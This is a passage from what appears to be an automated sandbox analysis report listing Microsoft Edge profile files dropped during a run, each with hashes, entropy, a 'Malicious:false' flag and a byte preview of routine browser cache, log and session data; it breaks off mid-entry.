                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):72
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.565412423760729
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:PXPXQyXl/ld/lxEwlt/lhKl:nzuQMl
                                                                                                                                                                                                                                                                                                                                MD5:D4C72F65FF522913BB81AF038762FC21
                                                                                                                                                                                                                                                                                                                                SHA1:FC8F72B66E39C56A007AED816C93EA5AE6CF5AB3
                                                                                                                                                                                                                                                                                                                                SHA-256:26945B52D7634B985568BAC7018D9250A2AD35F3DC35E7FDA1330744C3082B66
                                                                                                                                                                                                                                                                                                                                SHA-512:828AB95A83329F3BBA1B385C3E1878AAA85146CF700C5C97F79CAFD1FBEF779B6FCCB24C7CE229E3E11C63ABC937B12DBBCED4C02DDC40DB71E0FA9022A4720D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:@...z2j.oy retne.........................X....,................(.*.&./.

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF4346a.TMP (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):72
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.565412423760729
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:PXPXQyXl/ld/lxEwlt/lhKl:nzuQMl
                                                                                                                                                                                                                                                                                                                                MD5:D4C72F65FF522913BB81AF038762FC21
                                                                                                                                                                                                                                                                                                                                SHA1:FC8F72B66E39C56A007AED816C93EA5AE6CF5AB3
                                                                                                                                                                                                                                                                                                                                SHA-256:26945B52D7634B985568BAC7018D9250A2AD35F3DC35E7FDA1330744C3082B66
                                                                                                                                                                                                                                                                                                                                SHA-512:828AB95A83329F3BBA1B385C3E1878AAA85146CF700C5C97F79CAFD1FBEF779B6FCCB24C7CE229E3E11C63ABC937B12DBBCED4C02DDC40DB71E0FA9022A4720D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:@...z2j.oy retne.........................X....,................(.*.&./.

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):5853
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.419756192665506
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:jUK0lbS2/5MdDRHuBRSwZC9FZp+2NR+LUQr9okv5R1VJ5nLl9iSrN+16jHv:OlB5M3uHS59Lp+27cU89DX/J5nLl9iSF
                                                                                                                                                                                                                                                                                                                                MD5:A9DDCA153C8BE86713299594FEBEC40E
                                                                                                                                                                                                                                                                                                                                SHA1:3FA61D511DB236D69399C91A94EF0F5A7C133ED2
                                                                                                                                                                                                                                                                                                                                SHA-256:42A0588EE3801F9E5C8E529854805C9C7733E252DD8BE288F766E95F87710965
                                                                                                                                                                                                                                                                                                                                SHA-512:8295E9E7108DF758B55B04B1FA9A8F36898E0134168C8497A19CDE567B8E50AC54A7F4315AD61305E6E03170DED692265DCF9E330F4E6E3A46B9C13A5A7A95FC
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f...............7L..b................next-map-id.1.Cnamespace-a0bb2749_312b_4d36_8aec_c67d8245604b-https://ntp.msn.com/.0V.e................V.e................V.e................V.e...................0.................map-0-shd_sweeper.*{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.e.h.p.s.b.t.q.s.t.,.p.r.g.-.m.s.n.-.o.l.d.b.r.a.n.d.,.m.m.s.-.s.c.-.s.c._.n.o.t._.b.i.d.,.p.n.p.w.e.a.t.o.d.a.y.,.s.h.s.t.r.3.c.c.n.,.p.r.g.-.s.h.-.s.h.s.t.r.3.c.a.r.,.p.r.g.-.s.h.-.s.h.s.t.r.n.c.c.n.,.i.c.r.s.c.a.l.l.-.s.p.o.r.t.s.,.p.r.g.-.1.s.w.-.s.a.h.o.l.d.o.u.t.2.0.2.4.0.6.2.8.,.p.r.g.-.1.s.w.-.a.b.o.r.t.w.v.2.,.1.s.w.-.t.p.s.n.-.d.s.t.p.r.g.1.d.c.y.7.-.t.,.1.s.-.t.p.s.n.-.d.s.t.d.c.y.7.,.1.s.-.t.p.s.n.p.1.-.d.t.d.c.,.p.r.g.-.1.s.w.-.1.-.d.l.y.s.c.l.,.p.r.g.-.1.s.w.-.d.l.y.s.o.c.i.a.l.,.p.r.g.-.1.s.w.-.s.b.t.m.o.u.t.-.1.,.p.r.

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):324
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.142587259443998
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:yhnN+q2P923oH+TcwtrQMxIFUt8hh+HZZmw+hhv3VkwO923oH+TcwtrQMFLJ:yIv4YebCFUt8a5/+TF5LYebtJ
                                                                                                                                                                                                                                                                                                                                MD5:19B650B3F8D0CA367C57D6B216097734
                                                                                                                                                                                                                                                                                                                                SHA1:A38392C4AECCCAE7975E022A55B1E28890862723
                                                                                                                                                                                                                                                                                                                                SHA-256:03409F513AB08523E8B3560E2E9ACC49ADB6D60F37A07AC4011BAF1769CD0EE0
                                                                                                                                                                                                                                                                                                                                SHA-512:A94CA699C601404286CEC0405D805F4E7E4575DCC019C7407E4AE4606486D24EF00B56A06127701193B89D0DAD14611AA8C9E79F2586CA93D3CB9D6AB8D29C89
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:20.354 19e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/10/28-17:02:20.359 19e8 Recovering log #3.2024/10/28-17:02:20.363 19e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):324
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.142587259443998
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:yhnN+q2P923oH+TcwtrQMxIFUt8hh+HZZmw+hhv3VkwO923oH+TcwtrQMFLJ:yIv4YebCFUt8a5/+TF5LYebtJ
                                                                                                                                                                                                                                                                                                                                MD5:19B650B3F8D0CA367C57D6B216097734
                                                                                                                                                                                                                                                                                                                                SHA1:A38392C4AECCCAE7975E022A55B1E28890862723
                                                                                                                                                                                                                                                                                                                                SHA-256:03409F513AB08523E8B3560E2E9ACC49ADB6D60F37A07AC4011BAF1769CD0EE0
                                                                                                                                                                                                                                                                                                                                SHA-512:A94CA699C601404286CEC0405D805F4E7E4575DCC019C7407E4AE4606486D24EF00B56A06127701193B89D0DAD14611AA8C9E79F2586CA93D3CB9D6AB8D29C89
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:20.354 19e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/10/28-17:02:20.359 19e8 Recovering log #3.2024/10/28-17:02:20.363 19e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13374622942181148

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1443
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.841637184481967
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:3QPOyThyeVOppsAF4unx/EtLp3X2amEtG1ChqBhEWHNIQKkOAM4K:3a8zFvyLp2FEkChAhEWNpHOp9
                                                                                                                                                                                                                                                                                                                                MD5:E4136BAC72E9620575B47CC5038D9BC5
                                                                                                                                                                                                                                                                                                                                SHA1:D931850F7615E28BF53611552ECB17A5517C9E88
                                                                                                                                                                                                                                                                                                                                SHA-256:C0BBD9D51D74426360098AED2AF09DB90C65545909B482669FA4EE6D9EC28B41
                                                                                                                                                                                                                                                                                                                                SHA-512:04013E7DFEA9083B195729001604076D52BF3CECD5FB4636F2604507A56FDB763235AA87634A9293B9F180DE0E7F567A13847D6C1B0EB761F2A77C71AD248F54
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:SNSS........y.q............y.q......".y.q............y.q........y.q........y.q........y.q....!...y.q................................y.q.y.q1..,....y.q$...a0bb2749_312b_4d36_8aec_c67d8245604b....y.q........y.q......n.........y.q....y.q........................y.q....................5..0....y.q&...{98952893-68FF-4A5D-A164-705C709ED3DB}......y.q........y.q...........................y.q............y.q........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x...........%......%.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                                                                MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                                                                SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                                                                SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                                                                SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):352
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.101884100828603
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:ypjWM+q2P923oH+Tcwt7Uh2ghZIFUt8hp11Zmw+hpjWMVkwO923oH+Tcwt7Uh2gd:ML+v4YebIhHh2FUt8P/+rLV5LYebIhHd
                                                                                                                                                                                                                                                                                                                                MD5:813BCAF1B5AD73C2C1F5C52B5AD78CDD
                                                                                                                                                                                                                                                                                                                                SHA1:6266E795093E4904BABA93CF31844AA1CFEE161B
                                                                                                                                                                                                                                                                                                                                SHA-256:D1BFA03C1C08FAFD29EA7C8459AE7983EB4B63DC308BF658767B8EB8578D281E
                                                                                                                                                                                                                                                                                                                                SHA-512:DB6321F92E5A725DD51FD445140919095AF48E1691697FC03166AB5901326E1533B3D7CB3EEC6C6DE78427AD5C8CD27C01B7BF12F83B609D387E338B2B57492A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:19.710 1d1c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/10/28-17:02:19.710 1d1c Recovering log #3.2024/10/28-17:02:19.710 1d1c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):352
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.101884100828603
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:ypjWM+q2P923oH+Tcwt7Uh2ghZIFUt8hp11Zmw+hpjWMVkwO923oH+Tcwt7Uh2gd:ML+v4YebIhHh2FUt8P/+rLV5LYebIhHd
                                                                                                                                                                                                                                                                                                                                MD5:813BCAF1B5AD73C2C1F5C52B5AD78CDD
                                                                                                                                                                                                                                                                                                                                SHA1:6266E795093E4904BABA93CF31844AA1CFEE161B
                                                                                                                                                                                                                                                                                                                                SHA-256:D1BFA03C1C08FAFD29EA7C8459AE7983EB4B63DC308BF658767B8EB8578D281E
                                                                                                                                                                                                                                                                                                                                SHA-512:DB6321F92E5A725DD51FD445140919095AF48E1691697FC03166AB5901326E1533B3D7CB3EEC6C6DE78427AD5C8CD27C01B7BF12F83B609D387E338B2B57492A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:19.710 1d1c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/10/28-17:02:19.710 1d1c Recovering log #3.2024/10/28-17:02:19.710 1d1c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):434
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.214560671834091
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:yhUL+q2P923oH+TcwtzjqEKj3K/2jMGIFUt8hh11Zmw+hhMF8lLVkwO923oH+Tcd:Kv4YebvqBQFUt8x1/+Pz5LYebvqBvJ
                                                                                                                                                                                                                                                                                                                                MD5:C32690772D0C575A607ACC0F5944B997
                                                                                                                                                                                                                                                                                                                                SHA1:8AE19ECE4E1FEFF59EF141885E1EC06373687D4A
                                                                                                                                                                                                                                                                                                                                SHA-256:80B301D5F64913E820F3561A93CC11F553FBE4F3784E883382C3AB4DB772462A
                                                                                                                                                                                                                                                                                                                                SHA-512:2D689BE06791BCDE100134FCF8C0475C6CC0E732B7A6CFF66F85196AD1D4847D8FC3CCC8243AE04D612F9D25AC96AA7BF4F6500362C01ED2D5F69C28826F5E70
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:20.379 19a8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/10/28-17:02:20.381 19a8 Recovering log #3.2024/10/28-17:02:20.390 19a8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):434
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.214560671834091
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:yhUL+q2P923oH+TcwtzjqEKj3K/2jMGIFUt8hh11Zmw+hhMF8lLVkwO923oH+Tcd:Kv4YebvqBQFUt8x1/+Pz5LYebvqBvJ
                                                                                                                                                                                                                                                                                                                                MD5:C32690772D0C575A607ACC0F5944B997
                                                                                                                                                                                                                                                                                                                                SHA1:8AE19ECE4E1FEFF59EF141885E1EC06373687D4A
                                                                                                                                                                                                                                                                                                                                SHA-256:80B301D5F64913E820F3561A93CC11F553FBE4F3784E883382C3AB4DB772462A
                                                                                                                                                                                                                                                                                                                                SHA-512:2D689BE06791BCDE100134FCF8C0475C6CC0E732B7A6CFF66F85196AD1D4847D8FC3CCC8243AE04D612F9D25AC96AA7BF4F6500362C01ED2D5F69C28826F5E70
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:20.379 19a8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/10/28-17:02:20.381 19a8 Recovering log #3.2024/10/28-17:02:20.390 19a8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\00fde652-b769-4cd9-b75a-d51a994246f0.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\099e8a68-6eb3-42c7-b4ae-199f9c0c4d1e.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\5f8ca002-ad7c-488c-94e8-aa97bb0ff354.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):144
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.842082263530856
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiBn1KKyRY:YHpoeS7PMVKJTnMRK3B1KF+
                                                                                                                                                                                                                                                                                                                                MD5:F32592F4926E25E0D647EA7E4CBCD3FE
                                                                                                                                                                                                                                                                                                                                SHA1:4126DAA71810BDC438563699F77D5DA66DD3295E
                                                                                                                                                                                                                                                                                                                                SHA-256:BB0A228D78AE9A4E3508B13B041710AAA7E658AAA526FA553719851EB4F2303A
                                                                                                                                                                                                                                                                                                                                SHA-512:96F9B027B0E7E44E14006EAC6DE05A6CF684F5D6427004737CC379DC02875FA1D65C422AB6CA0EF89C0555ACD12B1D99F552894F15EE9EAF1A203FE58835A35D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\781bd59d-bddf-42ac-9772-bb662bca06bb.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
